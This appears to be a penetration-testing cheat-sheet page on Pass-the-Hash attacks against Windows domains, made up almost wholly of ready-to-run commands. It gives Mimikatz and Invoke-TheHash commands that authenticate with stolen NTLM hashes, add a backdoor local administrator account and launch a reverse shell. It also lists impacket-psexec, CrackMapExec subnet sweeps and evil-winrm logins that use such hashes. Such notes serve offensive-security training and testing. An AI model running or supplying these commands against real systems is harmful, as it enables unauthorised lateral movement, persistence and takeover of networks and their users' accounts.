Pass-the-Hash (PtH)

From Windows

Mimikatz

mimikatz.exe privilege::debug "sekurlsa::pth /user:eren /rc4:paste-hash-here /domain:domain.local /run:cmd.exe" exit

PowerShell Invoke-TheHash

# Importing the module
Import-Module .\\Invoke-TheHash.psd1

# Invoke-TheHash with SMB
# below command will add local administrator to target system
Invoke-SMBExec -Target ip -Domain domain.com -Username eren -Hash paste-hash -Command "net user eren Password123 /add && net localgroup administrators eren /add" -Verbose

# Invoke-TheHash with WMI 
# below command will run a reverse shell 
Invoke-WMIExec -Target DC01 -Domain Administrator -Username eren -Hash paste-hash -Command "powershell -e reverse can be copied from revshells.com"

From Linux

Impacket-Psexec

impacket-psexec administrator@ip -hashes :30B3783CE2ABF1AF70F77D0660CF3453

CrackMapExec

crackmapexec smb 10.10.1.0/24 -u Administrator -d . -H hash

crackmapexec smb ip -u Administrator -d . -H hash -x whoami

evil-winrm

evil-winrm -i ip -u Administrator -H hash
PreviousCredential Hunting in WindowsNextCracking Files

Last updated